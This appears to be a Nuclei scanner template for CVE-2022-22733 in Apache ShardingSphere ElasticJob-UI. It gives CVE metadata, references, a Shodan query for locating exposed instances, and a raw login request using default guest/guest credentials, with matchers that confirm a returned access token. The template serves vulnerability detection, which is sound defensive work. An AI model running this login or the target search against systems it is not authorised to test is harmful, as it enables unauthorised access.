id: CVE-2022-22733

info:
  name: Apache ShardingSphere ElasticJob-UI privilege escalation
  author: Zeyad Azima
  severity: medium
  description: |
    Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache ShardingSphere ElasticJob-UI allows an attacker who has a guest account to escalate privileges. This issue affects Apache ShardingSphere ElasticJob-UI 3.x version 3.0.0 and prior versions.
  remediation: |
    Apply the latest security patches or updates provided by Apache ShardingSphere to mitigate the privilege escalation vulnerability.
  reference:
    - https://www.vicarius.io/vsociety/blog/cve-2022-22733-apache-shardingsphere-elasticjob-ui-privilege-escalation
    - https://nvd.nist.gov/vuln/detail/CVE-2022-22733
    - https://lists.apache.org/thread/qpdsm936n9bhksb0rzn6bq1h7ord2nm6
    - http://www.openwall.com/lists/oss-security/2022/01/20/2
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2022-22733
    cwe-id: CWE-200
    epss-score: 0.17749
    epss-percentile: 0.95623
    cpe: cpe:2.3:a:apache:shardingsphere_elasticjob-ui:3.0.0:-:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: apache
    product: shardingsphere_elasticjob-ui
    shodan-query: http.favicon.hash:816588900
  tags: cve,cve2023,exposure,shardingsphere,apache

http:
  - raw:
      - |
        POST /api/login HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/plain, */*
        Access-Token:
        Content-Type: application/json;charset=UTF-8
        Origin: {{RootURL}}
        Referer: {{RootURL}}

        {"username":"guest","password":"guest"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"success":true'
          - '"isGuest":true'
          - '"accessToken":'
        condition: and

      - type: word
        part: header
        words:
          - application/json

      - type: status
        status:
          - 200
# digest: 4a0a0047304502201db20ed64c24fbb7d53bbfbfc7c41a8a08c0e0ba1e9bacc26a7bfbf9b4404123022100db8355e69eca9189db7bf798dd1d648e98bbc1dba79d55681b4970abcf307dd4:922c64590222798bb761d5b6d8e72950